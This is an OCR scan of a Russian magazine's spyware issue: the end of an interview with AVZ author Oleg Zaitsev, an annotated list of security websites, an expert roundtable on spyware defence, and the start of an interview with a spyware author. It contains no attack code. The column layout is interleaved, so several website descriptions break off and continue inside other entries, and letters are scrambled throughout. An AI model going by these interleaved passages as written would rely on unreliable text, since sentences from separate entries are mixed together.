манда в скриптовом движке, о котором известно 
только 2-3 бета-тестерам. А потом фича появляет- 
ся официально, и ключик исчезает. Причем чаще 
всего все скрытые функции описаны в доке, и все 
рассчитано на то, что если человек доку не читает, 
то ему и опция эта не нужна. 


Я ТАК И ЗНАЛ :(. И ВСЕ РАВНО 
КОЛИСЬ! ХОТЯ БЫ РАССКАЖИ КАКОЙ- 
НИБУДЬ ПРИКОЛЬНЫЙ МОМЕНТ ИЗ 
ПРОЦЕССА РАЗРАБОТКИ. 


ОЛЕГ ЗАЙЦЕВ: В разработке прикольных мо- 
ментов бывает мало — это по большей части рути- 
на. А вот в тестировании приколов хватает. Бли- 
жайший пример: тестировался поведенческий 
анализатор в антикейлоггере. Он дразнит хук раз- 
ными событиями, в том числе клавиатурными. Я 
выбрал какое-то дикое сочетание клавиш для та- 
кого дразнения. Начались тесты. У первого же те- 
стера был хук клавиатуры для вызова словаря, 
кстати, настроен он был именно на это сочета- 
ние... AVZ почуял реакцию и удвоил усилия по 
дразнению, а бедный переводчик решил, что юзе- 
ру нужно две сотни его окон, и стал их открывать. 


А КАК ТЫ ВООБЩЕ ПОДОШЕЛ К ИДЕЕ 
СОЗДАТЬ СВОЮ, ДА ЕЩЕ И 
НЕКОММЕРЧЕСКУЮ ПРОГРАММУ? 
СКОЛЬКО ВРЕМЕНИ ТЕПЕРЬ УХОДИТ 
НА ЕЕ ПОДДЕРЖКУ? 


ОЛЕГ ЗАЙЦЕВ: Исходно-то я делал AVZ исклю- 
чительно для своих нужд. Я работаю в службе ин- 


формационной безопасности крупной конторы, 
сеть громадная, поэтому некий подручный инстру- 
мент для борьбы с разной заразой часто экономит 
много времени. У первых версий AVZ вообще не 
было интерфейса — что-то типа консольного ска- 
нера-анализатора. Потом я стал добавлять к нему 
разные инструменты для упрощения отлова раз- 
ных шпионов — программа стала расползаться за 
пределы конторы. Видя это, я просто добавил хелп 
и выложил ее для публичного использования. А 
делать его коммерческим смысла особого нет — 
денег больших это не принесет, да и брать деньги 
с собратьев-сисадминов мне как-то не хочется, по- 
этому проект некоммерческий. На поддержку вре- 
мя, конечно, уходит, но не очень много — у меня в 
вирлабе все автоматизировано до безобразия, так 
что справляюсь без проблем. Кроме того, у меня 
есть целая армия добровольных помощников — 
кто зверье свежее присылает, кто ссылки на злов- 
редов — это сильно помогает в работе. 


ТЕБЕ, НАВЕРНОЕ, ЧАСТО ПИШУТ 
ЛАМЕРОВАТЫЕ ПОЛЬЗОВАТЕЛИ 
(ХОТЯ ВРЯД ЛИ САМЫЕ СЛАБОУМНЫЕ 
ДОБЕРУТСЯ ДО САМОГО ФАКТА ЕЕ 
СУЩЕСТВОВАНИЯ), НО ВСЕ РАВНО 
МОЖЕШЬ ПРИВЕСТИ КАКОЙ-НИБУДЬ 
ПЕРЛ ИЗ ПИСЕМ ПОЛЬЗОВАТЕЛЕЙ? 


ОЛЕГ ЗАЙЦЕВ: Да, такое бывает. Ближайший 
прикол — письмо с текстом: «... я не могу при- 
слать запрошенный подозрительный файл. Поэ- 
тому присылаю его фотографию — может, она по- 
может разобраться, вирус это или нет...». К пись- 
му прицеплена ВМР'шка размером 2 Мб со скрин- 
шотом, на ней — проводник с папкой, в которой 
виден тот самый подозрительный файл. Остается 
только создать доску «Их разыскивает вирусо- 
лог» и приклеить на нее распечатанные «фото- 
графии файлов». 


А С НОРМАЛЬНЫМИ ЛЮДЬМИ КАК? :). 
НАВЕРНЯКА ЖЕ ПРИХОДИЛОСЬ 
ОБЩАТЬСЯ С ИЗВЕСТНЫМИ 
ЛИЧНОСТЯМИ SPYWARE И ANTISPY- 
WARE МИРА? РАССКАЖИ ПРО НИХ 
КАКИЕ-НИБУДЬ ИНТЕРЕСНЫЕ БАЙКИ. 


ОЛЕГ ЗАЙЦЕВ: По поводу лиц зру-индустрии, я, 
честно говоря, ни одного не знаю лично... А что ка- 
сается антиспай, то некоторые примеры могу при- 
вести. Первый пример — Вячеслав Коляда (дирек- 
тор вирлаба VBA, http://anti-virus.by/). Антивирус VBA 
не просто ловит malware — специалисты вирлаба 
периодически задаются вопросами правильности 
классификации того или иного подозреваемого, 
что, по моему разумению, очень полезный и пра- 
вильный процесс. Дело в том, что часто изучае- 
мый образец находится на границе «зловред- 
обычное ПО», и его признание в качестве adware 
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весьма условно, так что мы периодически обсуж- 
даем вопросы классификации того или иного 
зловреда. Второй пример — Лаборатория Каспер- 
ского во главе с Евгением Касперским. Большой 
плюс их подхода к детекту Malware — это диагно- 
стика не только явных adware/spyware, но и все- 
возможных Downloader, RemoteAdmin и подобных 
средств. В результате расширенная база АУР мо- 
жет быть страшнее атомной бомбы для неопытно- 
го пользователя, но зато крайне полезна для спе- 
циалиста в области безопасности. 


О'КЕЙ, ПЕРЕЙДЕМ К БЛИЦ-ОПРОСУ. 
КАКАЯ КНИГА, РЕСУРС И ЧЕЛОВЕК 
БОЛЬШЕ ВСЕГО ПОВЛИЯЛИ НА ТЕБЯ 
КАК НА КОДЕРА? 


ОЛЕГ ЗАЙЦЕВ: «Справочник по прерываниям 
IBM PC» в двух томах. С нее у меня началось глу- 
бинное изучение системы... Кроме того, сильное 
влияние оказали мои родители: когда родители — 
технари, алгоритмическое мышление вырабаты- 
вается чуть ли не с пеленок. 


А ЧИТАТЕЛЮ, ЕСЛИ ОН ВДРУГ 
СОБЕРЕТСЯ ПИСАТЬ СВОЙ 
АНТИСПАЙВАР, КАКИЕ КНИГИ 
ПОСОВЕТУЕШЬ ПОЧИТАТЬ, С КАКИМИ 
САЙТАМИ ОЗНАКОМИТЬСЯ? 


ОЛЕГ ЗАЙЦЕВ: Одной книжкой явно не обой- 
тись. Как минимум, нужно изучить пару-тройку 
книг по ассемблеру, далее не помешает ознако- 
миться с трудами Криса Касперского (в особенно- 
сти «Образ мышления — дизассеблер IDA»), изу- 
чить «Отладчик Зо СЕ» Айрапетяна. Это все для 
того, чтобы научиться анализировать зловредов 
и писать низкоуровневый код. Далее однозначно 
нужно изучить С — тут книжек тьма. Не повредит 
прочитать книгу «Программирование драйверов 
Windows» Солдатова, однозначно нужно изучить 
труд Г. Неббета «Справочник по базовым функ- 
циям API Windows NT/2000» и «Недокументиро- 
ванные возможности Windows 2000» Свена Шрай- 
бера. Очень полезно почитать трехтомник Д. Кну- 
та «Искусство программирования» — там много 
полезных алгоритмов. 


НУ, С ТРУДАМИ КРИСА НАШИ 
ЧИТАТЕЛИ ХОРОШО ЗНАКОМЫ, 
ПОСКОЛЬКУ РЕДКИЙ НОМЕР 
ОБХОДИТСЯ БЕЗ ЕГО СТАТЕЙ. 
ИТАК, САМЫЙ ГЛАВНЫЙ ВОПРОС: 
ЕСТЬ ЛИ ЧЕЛОВЕК, КОТОРОГО ТЫ 
БЫ ХОТЕЛ СКОРМИТЬ ГИГАНТСКОМУ 
ШАЙ-ХУЛУДУ С ПЛАНЕТЫ ДЮНА? 


ОЛЕГ ЗАЙЦЕВ: Встречный вопрос: а если червь 
после этого отравится ? :) Если серьезно, то тако- 
го человека я назвать не могу © 
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На этих ресурсах ты найдешь 
массу дополнительной 
информации. Андрей Каролик 


www.kaspersky.ru 


Лаборатория Касперского — 
пожалуй, не только наиболее 
популярная российская 
разработка и раскрученный 
бренд, но и весьма полезный 
ресурс, на котором есть 
масса интересного даже 

для тех, кто никогда не поку- 
пал и не устанавливал их ан- 
тивирусов и утилит. Речь идет 
о вирусной энциклопедии — 
www.viruslist.com/ru/. Прежде 
всего это актуальные новос- 
ти из мира вирусов — 
www.viruslist.com/ru/news. Плюс 
обширный сборник сущест- 


www.bugtrack.ru 


Название обманчиво, так 
как первое впечатление от 
него — бесконечная новост- 
ная лента и просто масса 
различных уязвимостей. 

На деле концепция совсем 
иная — только самое акту- 
альное, только самое важное 
и восновном по известным 
программам. На фоне других 
проект выделяется тем, что 
отслеживает тенденции, ана- 


вующих вирусов с достаточ- 
но подробным описанием: 
что заражают, как выглядят, 
чем чревато знакомство, 

и что делать, если встреча 
уже произошла. Тут же 
статьи, посвященные исто- 
рии вредоносных программ 
(сетевые черви, классичес- 
кие вирусы, троянские прог- 
раммы и прочая нечисть), 
разработчикам вирусов 

и перспективам в ближай- 
шем будущем. Для фанатов 
есть даже хит-парад 20 наи- 
более нашумевших виру- 
сов/троянов/шпионов за пос- 
ледний месяц. Еще на сайте 
есть возможность онлайн- 
тестирования на наличие ви- 
русов — www.kaspersky.ru/ 
virusscanner, но с некоторыми 
ограничениями. 


литику, информирует о наи- 
более значимых событиях, а 
не обо всем подряд. Раздел 
«Форум» — дань моде. А вот 
в статьях есть очень непло- 
хие материалы. 


www.xakep.ru 


Новости, bugtrack и статьи — 
и это еще далеко не все. 
Основная ценность этого ре- 
сурса заключается в боль- 
шом архиве старых номеров 
Хакер Спец’а и Хакера. 

А вних уже были опублико- 
ваны некоторые статьи по те- 
ме шпионов/вирусов/троя- 
нов. К примеру, в июньском 
номере за 2005 год есть 
статья (www.xakep.ru/magazine/ 
xa/078/076/1.asp) про создание 
и поддержку настоящего бот- 
нета — при помощи приват- 
ной IRC-cetu на базе софта 


Www.progz.ru 


Я не знаю, самый ли это по- 
пулярный форум по прог- 
раммированию, но, судя по 
количеству зарегистриро- 
ванных пользователей и об- 


суждаемых тем, здесь есть, 
что почитать. Для удобства 
все темы разделены на раз- 
ные направления: програм- 
мирование под Windows, 
языки программирования, 
веб-программирование, 


UnreallRCD. Никто не гово- 
PUT, что ботнет-сеть обяза- 
тельно должна совершать 
противоправные действия - 
все сугубо для самообразо- 
вания :). А в майском номере 
за 2006 год есть занятная 
статья (www.xakep.ru/magazine/ 
ха/089/060/1.азр) с наглядным 
примером буквальной трепа- 
нации сетевого червя 
Win32.Mytob.D. Так сказать, 
наш ответ вирусописателям — 
не бояться и отгораживаться, 
а брать голыми руками и изу- 
чать :). Если взять в руки по- 
исковик и ввести нужные 
слова и словосочетания, най- 
дешь массу других статей. 

И что приятно: очень старые 
номера доступны в РОЕ-фор- 
мате (читай вместе с ориги- 
нальными иллюстрациями 
к тексту). 


технологии программирова- 
ния, программирование под 
*nix, теория программирова- 
ния, мобильные платфор- 
мы, программирование 
платформенно-независи- 
мых систем и базы данных. 
Здесь можно не только 
спросить совета, узнать 
последние новости или по- 
делиться своими знаниями, 
но и найти единомышленни- 
ков для создания интерес- 
ных проектов. Пытаться 
найти тут что-то методом 
тыка, по-моему, вообще 
бесполезно, только при по- 
мощи поиска. Еще здесь 
есть актуальная ветка для 
программистов — работа 
(www.progz.ru/forum/index.php?sh 
owforum=42), причем весьма 
солидные вакансии — с ок- 
ладами до 3000 и выше. 


www.cracklab.ru 


Крэкер в понимании многих 
некрэкеров — нехороший 
человек, редиска и враг все- 
го лицензионного и коммер- 
ческого. На самом деле это 
всего лишь исследователь 
программ, а уж как он ис- 
пользует свои знания — на 
благо или во вред — это уже 
другой вопрос. Но суть не в 
этом. Если ты собираешься 
искать шпионов/троянов/ви- 
русы и заниматься их трепа- 
нацией, многие навыки крэ- 
кера будут тебе очень кста- 
ти. Небольшая коллекция 


www. hijackthis.de 


Ни для кого не секрет, 

что браузер от М$ — дыря- 
вый вдоль и поперек, что 
позволяет цеплять себе на 
компьютер через интернет 
так называемые hijack. В пе- 
реводе на доступный язык 
это вредоносные дополне- 
ния, заменяющие в браузе- 
ре домашнюю страницу, 
открывающие дополнитель- 
ные окна ит.п. 
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статей, написанных крэкера- 
ми, поможет тебе разоб- 
раться в процессе дизассе- 
мблирования и исследова- 
ния любого кода. Тут же на- 
бор необходимого: интерак- 
тивный дизассемблер IDA 
Рго, автоматический распа- 
ковщик программ Quick 
Unpack, анализатор испол- 
няемых файлов РЕГ, xopo- 
ший упаковщик WinUpack 

и многое другое. Плюс куча 
литературы в электронном 
виде по ассемблеру, Delphi, 
C/C++ u PHP. А если оста- 
лись вопросы — добро по- 
жаловать на форум. 


HijackThis (http://download. 
hijackthis.eu/hijackthis_199.zip) — 
специальная утилитка, KOTO- 
рую стоит иметь у себя на 
компе и периодически за- 
пускать. Она просматривает 
систему и жесткий диск на 
наличие hijack, чистит и пи- 
шет специальные лог-файлы 
о состоянии дел на твоей ма- 
шине. Программу не надо инс- 
таллировать, а лог-файлы 
можно анализировать онлайн, 
в обычном текстовом формате. 
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АЛЕКСЕЙ 
ПЕТРОВ 


BIT 20 лет. Эксперт 

в области защиты 
данных, эксперт 

по компьютерным 
преступлениям, 
эксперт по сетевым 
коммуникациям 

и телефонии. 
Сертификаты от Novell/ 
3com/Bay/Siemens/Cisco/ 
ISACA. Консультант 

no Bonpocam 
ИТ-безопасности 

в Secproof Oy 
(www.secproof.com). 
Свободный консультант 
Arhont.com, iPRO.Iv. 


АЛЕКСЕЙ 
ЛУКАЦКИЙ 
Бизнес-консультант по 
безопасности Cisco 
Systems. В Cisco отвечает 
за развитие направления 
безопасности в России и 
странах СНГ. 


|| ШПИОНЫ — РЕАЛЬНАЯ УГРОЗА 
ИЛИ ШУМИХА, КАК И ПРОБЛЕМА У2К? 


ВЛАДИМИР 
КОМИССАРОВ 
Начальник !Т-отдела 
одной из компаний. 


АНТОН 

КАРПОВ 

Специалист в области 
информационной 
безопасности. В «Х» 
пишет с переменной 
периодичностью вот 
уже несколько лет. 

Круг профессиональных 
интересов: сетевые атаки, 
безопасность UNIX- 
систем, безопасность 
беспроводных сетей... 


КРИС 

КАСПЕРСКИ 
Известен еще как мыщьх. 
Компьютеры грызет еще 
с тех времен, когда 
Правец-8Д считался 
крутой машиной, 

а дисковод с монитором 
были верхом мечтаний. 
Освоил кучу языков 

и операционных систем, 
из которых реально 
использует W2K, алюбит 


FreeBSD 4.5. Живет 
в норе, окруженной 
по периметру 
компьютерами 
и стеллажами 
с литературой. 


КРИС КАСПЕРСКИ: Проблема дырявого ПО — вполне осязаема и реальна, 
особенно в отношении продуктов Microsoft, в которых регулярно выявляются 
свежие баги. Поэтому проникнуть в любой компьютер, подключенный к Сети, 
может даже неквалифицированный программист или в просторечии «пио- 
Hep». Что, собственно говоря, регулярно и происходит. 

В основном, конечно, атакам подвергаются web-cepBepbl и корпоратив- 
ные сети, содержащие закрытую информацию. Домашние пользователи на- 
ходятся в меньшей опасности в силу своего большинства, хотя степень защи- 
щенности их компьютеров гораздо слабее. Можно провести аналогию с заказ- 
ными убийствами бизнесменов и бандитизмом, царящим на улицах. Средне- 
статистический прохожий абсолютно не защищен, но шансы быть убитым у 
него намного ниже, чем у любого бизнесмена с целой свитой охраны. Ежед- 
невно совершается множество убийств и вторжений в компьютеры (как до- 
машние, так и корпоративные), никто не может чувствовать себя в абсолют- 
ной безопасности. Но всегда следует помнить, что паническая истерия перед 
неизвестной угрозой намного опаснее самой этой угрозы. 

АНТОН КАРПОВ: Если говорить о проблеме с точки зрения менеджера или 
маркетолога, то можно найти сотни отчетов исследовательских компаний о 


НУЖНЫ ЛИ ОТДЕЛЬНЫЕ СРЕДСТВА 
ЗАЩИТЫ ИЛИ ДОСТАТОЧНО 
ГРАМОТНОГО АНТИВИРУСА, В КОТОРОМ 
ВСЕ, ЧТО НАЗЫВАЕТСЯ, ВКЛЮЧЕНО? 
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TOM, как Spyware приносят ежегодные убытки различным компаниям. Однако пока ты (твоя компания) 
сам не столкнешься с этой проблемой, все эти отчеты, возможно, будешь считать «сферическим конем в 
вакууме». Это можно понять. 

Поэтому отвечу на вопрос с чисто технической точки зрения. А правда здесь состоит в том, что со- 
временные пользовательские программы (например, веб-браузер), через которые большинство шпион- 
ского ПО и проникает на компьютеры пользователей, стали невероятно сложны и потому подвержены 
различным уязвимостям. Если посмотреть на историю уязвимостей веб-сервера (Apache) и веб-браузе- 
ра (IE) за этот год, то у последнего она в разы больше! Это говорит о том, что клиент, потребитель трафи- 
ка, сегодня подвержен множеству рисков, эксплуатация которых, при отсутствии защиты, становится 
тривиальной задачей. И как уже мы воспользуемся возможностью «поиметь» клиента — зашлем ему 
шпиона или еще как — уже второй вопрос. 

ВЛАДИМИР КОМИССАРОВ: Надо подразделять понятие шпионских мотивов, а так же программ. 
Если мы говорим о физическом лице и его личной информации — это дело каждого. И, думаю, мало кто 
страдает паранойей насчет сохранности неких данных. И совсем другое дело — шпионство в масштабах 
предприятий, компаний и какого-либо бизнеса. Шумихой это могут называть только дилетанты или сам- 
оуверенные личности. Любая угроза, даже мнимо-потенциальная, должна рассматриваться, как реаль- 
ная и должны быть приняты все меры по предотвращению любых вторжений, как извне, так и внутри ин- 
формационной среды. Этому моменту необходимо уделять внимание. Лучше быть подготовленным, чем 
обескураженным. 

АЛЕКСЕЙ ПЕТРОВ: Угроза реальна, но He смертельна. Как и с Y2K, общество IT в целом переживет 
эту проблему. Также как и с У2К, много денег будет неразумно потрачено не на те проблемы. Надо боро- 
ться с причинами, а antivirusi/firewall'bi — это борьба с последствиями. В целом, проблема «шпионского 
ПО» будет помасштабнее и более комплексной, а риски — более серьезными. Все-таки просто безвоз- 
вратная «потеря» данных (Y2K — отказ в обслуживании) и попадание в чужие руки (шпионаж) — вещи 
несопоставимые. Целенаправленные шпионы представляют большую угрозу для корпоративных клиен- 
тов и целевых групп, на которые они ориентированны, — они обходят средства защиты и крадут конкрет- 
ную информацию. Индивидуально написанный шпион не будет распознан по сигнатуре и, скорее всего, 
при талантливом подходе, сможет обойти и средства защиты proxy/firewall's. 

Проблема будет актуальной до тех пор, пока «дырки» в системе залатываются медленно, а ком- 
плексность и сложность системы растет с куда большей скоростью. Без изменения механизмов защиты 
в самой OS, даже при наличии активных «навесных» средств защиты, срабатывать они будут значитель- 
но чаще — и даже опытный пользователь не всегда правильно сможет распознать и ответить, как реаги- 
ровать в каждой ситуации, когда стоит разрешить, а когда запретить исполнение. 


КРИС КАСПЕРСКИ: Антивирус — всего лишь одно из защитных средств (точнее, подкласс защитных 
средств и довольно обширный: сканеры, ревизоры ит. д.), который нацелен на решение определенного 
круга задач. Кстати говоря, в последнее время становящихся все менее актуальными. Вирусы (то есть 
программы, внедряющиеся в другие программы) практически полностью перевелись, и сейчас приходит- 
ся бороться в основном с червями и удаленными атаками. Антивирус может обнаружить известного ему 
червя и даже может убить его, но что толку? Ведь дыру, через которую приходит червь, антивирус зак- 
рыть не может. Тут нужна заплатка от производителя ПО. Откуда она у антивируса? А с удаленными ата- 
ками антивирус не может справиться в принципе, особенно если эПей-код пишется под конкретную атаку 
и существует в единственном экземпляре. Для отражения атак применяют системы обнаружения втор- 
жений, honeypot'bl (образно говоря, «капканы для хакеров»), и много чего еще. Конечно, коробка с ди- 
ском, на котором написано «антивирус», может содержать в себе все, что угодно, но это уже скорее во- 
прос терминологии, чем, собственно, самой защиты. 

АНТОН КАРПОВ: Если коротко, то да, нужны. Незащищенный пользователь выходит в интернет, с уяз- 
вимым веб-браузером и уязвимым почтовым клиентом и сталкивается с большим количеством угроз. 
Решить его проблемы призваны те самые «грамотные антивирусы «all-in-one». Однако есть и другие спо- 
собы. Как вариант — идея очистки «грязного» интернет-трафика. Согласно этой идее, контент фильтрует- 
ся на наличие вирусов, троянов, шпионских программ и даже спама еще на стороне провайдера, на спе- 
циальных шлюзах. И до клиента доходит уже «очищенный» трафик. Подобная услуга только ищет свое 
применение в России, однако в некоторых странах провайдеры уже предлагают подобный «чистый ин- 
тернет», который стоит, разумеется, дороже. Техническое исполнение такого решения, которое бы обла- 
дало эффективной пропускной способностью и в то же время уверенно фильтровало трафик, возможно, 
и подобные продукты есть. Такой подход кажется более разумным и в перспективе — правильным. 
ВЛАДИМИР КОМИССАРОВ: Это дело совести и профессионализма каждого, скажем так, отвечаю- 
щего 3a «security», в широком смысле этого слова. Чтобы рассмотреть необходимость чего-либо, надо 
иметь представление о информационной среде, которую собираешься охранять. В каждом отдельном 
случае, конечно же, нужна дополнительная защита, причем желательно индивидуально предусмо- 
тренная. Не говорю о том, что нужно садиться и писать какой-либо софт своими руками. Надо просто 
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предусмотреть все возможные как реальные, так и фантастические пути проникновения в среду, и уже 
это будет немаловажным этапом по защите. Главное — не забывать следить за соответствующими 
рассылками, уязвимостями и так далее. А то, как обычно бывает, поставят и забудут — вот основная 
причина уязвимости. 
АЛЕКСЕЙ ЛУКАЦКИЙ: Мой опыт показывает, что большинство антивирусов и даже персональных си- 
стем предотвращения атак не способны эффективно бороться с Spyware, а посему необходимо исполь- 
зование других защитных мер. Далеко не всегда это должен быть платный или вообще какой-то специа- 
лизированный продукт. Многие проблемы решают бесплатные утилиты, коих в интернете можно найти в 
избытке. Одной из таких утилит является BHODemon, которая отслеживает появление Spyware, инстал- 
лируемого через механизм Browser Helper Objects. Еще одним эффективным защитным маневром явля- 
ется регулярное обновление своего компьютера путем установки патчей, service pack'os и т.д. Это позво- 
лит прикрыть те дыры, которые используются Spyware для проникновения. Но главное — бдительность и 
здравомыслие. Не надо ставить «левый» софт, скачанный с «левых» сайтов. Не надо на каждое окошко, 
всплывающее в браузере, сразу жать «Да» или «Согласен». Это позволит существенно снизить пробле- 
му заражения своего компьютера с помощью Spyware. 
АЛЕКСЕЙ ПЕТРОВ: Spyware/mailware/virus — все эти «зловреды» для антивируса выглядят примерно 
одинаково. Они могут распознаваться по их уникальным «сигнатурам» (то есть по некоторой уникальной 
последовательности байтов), по их злобным действиям и следам, оставляемым в системе, эвристикой 
(эвристический анализ), эмуляцией исполнения кода или активного слежения (tracing). Но вот способно- 
стей к «врачеванию» у некоторых антивирусов не хватает. Конечно, они могут быть дополнены, но чаще 
всего они много распознают и кричат, но не очень лечат. Разница в работе антивирусов (anti-spyware/an- 
ti-trojans) базируется на следующих принципах: объем базы (количество записей) «зловредов», скорость 
обновления и пополнения этой базы, стабильность распознавания, классификация и реакция. Типичная 
проблема антивирусов — в распознавании «подозрительного» или несмертельного зверя «Mailware/ad- 
ware». «Криков» со стороны антивируса может быть чересчур много, что мешает работе пользователя. 
Комплекс средств всегда будет эффективнее. Чем больше ступеней защиты, тем выше ее надеж- 
ность и меньше риски. Но и тут все не так просто, ведь чем больше ступеней — тем сложнее и неудобнее 
пользоваться. Это как качели. На одной стороне безопасность, на другой — удобство пользователя, а ре- 
шение — в балансе между ними. 


КРИС КАСПЕРСКИ: MS создает рынок шпионского ПО. Во-первых, потому, что пишет небрежный, ды- 
рявый и излишне сложный код, который выбрасывает на рынок прежде, чем успеет протестировать. Во- 
вторых, она продвигает идею, что компьютер — это что-то вроде тостера: включил и работаешь. Читать 
инструкцию и сопутствующую литературу необязательно. Этим она оболванивает рядовых пользовате- 
лей и отнимает хлеб у профессиональных администраторов, в результате чего заботу о сервере поруча- 
ют случайным людям. Рынок защиты М$, похоже, совсем не интересует. Да, она интегрировала какую-то 
пародию на брандмауэр в последние версии ХР и создала несколько утилит для поимки малвари. Но чте- 
ние блогов их разработчиков создает стойкое впечатление, что эти люди увидели живую малврь уже по- 
сле написания своего чуда техники, которое, к тому же, очень легко обойти. И малварь будет его обхо- 
дить, как только получит распространение. На данный момент достоверно известно лишь одно — у MS 
есть деньги. Много денег. И если она захочет прибрать к рукам этот сегмент рынка... 

АНТОН КАРПОВ: Microsoft crout задуматься о том, где находится корень зла ;). Вместо того, чтобы вы- 
пускать защиту от проблем, появляющихся вследствие, в том числе и качества программного кода уяз- 
вимых систем, им следует следить за этим самым качеством кода. 

ВЛАДИМИР КОМИССАРОВ: Не думаю. В конкуренции рождается истина, и благодаря ей продолжает- 
ся развитие. Если конкуренции не будет, то используемый софт будет слабоват и уязвим. И потом, Micro- 
soft'a Ha всех не хватит. И это радует. 

АЛЕКСЕЙ ЛУКАЦКИЙ: Ее конкуренты сами вынудили компанию пойти этим путем. Когда MS выпусти- 
ла бесплатный MS AntiSpyware, большинство антивирусных производителей стали забрасывать ее иска- 
ми о нарушении монопольного законодательства и т.д. Однако MS сама всегда признавала, что ее реше- 
ния обеспечивают базовый уровень защиты, расширить который можно с помощью решений других вен- 
доров. Теперь же компанию вынудили вплотную заняться выпуском полноценного программного продук- 
та (или сервиса, такого как OneCare), который, учитывая возможности и ресурсы MS, потеснит многих 
игроков с этого рынка. Можно долго говорить о том, что серьезные покупатели не выберут М$ в качестве 
поставщика средств защиты, но рядовой пользователь почему-то этого «не слышит» и по-прежнему де- 
лает выбор в пользу продукции Microsoft. Также он поступит и сее решениями по защите компьютеров — 
это привычнее и гораздо выгоднее. 

АЛЕКСЕЙ ПЕТРОВ: Судя по уровню и тем продуктам М$, которые сейчас доступны, вряд ли М$ смо- 
жет завоевать этот рынок. Разве что компания в очередной раз скупит какую-нибудь успешную разра- 
ботку и введет ее в состав М$ :). Другой аспект проблемы заключается в том, что изначально неудачная 
конструкция и механизмы безопасности М$-продуктов как раз таки и являются корнем всей проблемы — 
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конструкция «никак» не противодействует активности вирусов и троянов. А множественные ошибки в 
ПО прикладного (IE/Outlook) и основного уровней (data-objects parsing/handling) представляют прекрас- 
ную платформу для активизации вирусов-троянов. Излишне сложный механизм обновлений только спо- 
собствует этому. 


ВЛАДИМИР КОМИССАРОВ: Абсолютно не согласен. Не сказать, что в корне, но ятак не думаю и пра- 
вильно делаю. Страх проходит: благо, компьютер в домах граждан — уже не диковинка. И сами они уже 
умеют давить на клавиши и осознают, что им надо, а что нет. Если же взять масштабы предприятия и 
ценности информации, то тут я в корне с господином Даниловым не согласен. Потому как не уследишь, 
какой сотрудник какой диск принесет, на какой сайт залезет... И последствия инфицирования могут 
серьезно отразиться на бюджете компании. Поэтому ГРАМОТНЫЙ П-специалист никогда не пренебре- 
жет защитой, пусть даже от дурака. Работа такая. 

АЛЕКСЕЙ ЛУКАЦКИЙ: Интересно слышать такое высказывание от разработчика Dr.Web. Но отчасти 
он прав. Проблемы излишне преувеличены. Число «диких» вирусов несопоставимо с числом вирусов, 
выращенных в пробирке и хранящихся только в исследовательских центрах антивирусных компаний. 
Большинство антивирусных компаний паразитируют на данной проблеме, пугая неискушенного пользо- 
вателя всякими страшилками. Ведь решить проблему вирусов можно гораздо эффективнее и не прибе- 
гая к большим финансовым затратам на приобретение антивирусов. Достаточно вспомнить, что для то- 
го, чтобы не заразиться дизентерией, в абсолютном большинстве случаев достаточно мыть перед едой 
руки и фрукты. Для этого не надо колоть себе антибиотики и пропускать фрукты через многоступенчатую 
систему химической очистки. Аналогичная ситуация и с антивирусными продуктами. 

АЛЕКСЕЙ ПЕТРОВ: Частично да. И происходит это частично из-за непонимания проблемы в целом. 
Антивирус — не панацея, а только одна из возможных навесных «ступенек» защиты, частично превен- 
тивная и частично пост-фактум мера, но это никогда не 100% гарантия. Антивирус ловит и распознает 
«знакомые» и «широко распространенные вирусы». Это противоядие, которое еще не факт что спасет, 
антивирус — это не прививка, у которой гарантии куда выше. «Зловреды» стараниями своих создателей 
за последнее время сильно мутировали и «поумнели»: приобрели способности обходить firewall'bI u рас- 
пространенные антивирусы, умеют самообновляться. А распространенные антивирусы — это как раз Te, 
которых в первую очередь и будут обходить. И цены на антивирусы искусственно сильно завышены. 


КРИС КАСПЕРСКИ: Прежде всего, это разграничение доступа — я вхожу в систему под администрато- 
ром только тогда, когда это действительно нужно, а в остальное время я — пользователь. Второе — ис- 
пользование максимально недырявого ПО (и в первую очередь отказ от IE в пользу Оперы/Лиса/Рыся). 
Третье — не запускаю программ, полученных из ненадежных источников на основной машине, только 
под VM Ware. И на закуску — раз или два раза в год запускаю онлайновый сканер Евгения Касперского, 
чтобы убедиться, что все спокойно. Или использую какой-нибудь другой антивирус. Поскольку это дела- 
ется чисто для успокоения (то есть создания иллюзии безопасности и самообмана), — выбор антивируса 
некритичен. 

АНТОН КАРПОВ: Так повелось, что системы и софт, который использую лично я, не подвержены шпио- 
нам, троянам и вирусам. Мне трудно вспомнить, когда я последний раз видел вирусы и трояны для Fre- 
eBSD (имеется в виду клиентская машина, так как я использую эту ОС в качестве настольной рабочей 
системы) или эксплоит для почтового клиента Mutt, например. 

ВЛАДИМИР КОМИССАРОВ: Использую корпоративный Symantec Antivirus и еще пару сторонних про- 
грамм. И, конечно, собственные глаза и руки. Анализ логов слежения за трафиком и процессами еще ни- 
кто не отменял, и никакая программа лучше тебя не заподозрит неладное задним чувством и не напра- 
вит на путь истинный. 

АЛЕКСЕЙ ЛУКАЦКИЙ: Во-первых, у меня установлен антивирус, который обеспечивает мне первую 
линию обороны. На втором уровне у меня задействуется несигнатурный Cisco Security Agent. Для защиты 
от BHO-spyware использую BHODemon. Конечно же, регулярная установка патчей, защищенная на- 
стройка браузера и ОС. И, наконец, здравомыслие при использовании интернета и различных «посторон- 
них» программ. Кстати, о последних. Я ими практически не пользуюсь. Я либо приобретаю лицензионное 
ПО, либо использую то, что мне централизованно предоставляет компания (а это очень большой список). 
АЛЕКСЕЙ ПЕТРОВ: Для Win применяю комплекс из нескольких антивирусов, нескольких antispyware, 
активный персональный firewall (мои рекомендации — Outpost Firewall от Agnitum), плюс соответствую- 
щая настройка самой системы, как минимум IE/MS win. Активный application layer firewall не просто бло- 
кирует какие-то порты, а распознает, кто пытается установить соединение. Agnitum FW был первым на 
этом пути и по-прежнему полон новаторских идей. Кстати, популярность альтернативных web browser'oB 
тоже в некоторой степени базируется на снижении рисков инфицирования, по сравнению C IE. В каждом 
конкретном случае все подбирается, исходя из условий, под задачи, которые надо решать. Хорошая за- 
щита — это всегда индивидуальный и уникальный подход, а информация о периметре и средствах безо- 
пасности — это часть мер безопасности, и тоже секрет. Стандартная защита и ломается стандартно © 
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ТЫ ПИШЕШЬ ШПИОНСКОЕ ПО. ЭТО 


© ХОББИ ИЛИ СПОСОБ ЗАРАБОТКА? 


Сначала это было хобби: я с упоением ко- 

вырялся в операционных системах, изу- 
чал ассемблер, исследовал способы обхода фае- 
ров, механизмы внедрения. Вирусами баловал- 
ся, естественно. И у меня это получалось, скажем 
так, лучше, чем у других. В какой-то момент я по- 
нял, что на этом можно зарабатывать нехилые 
деньги и... понеслось. 


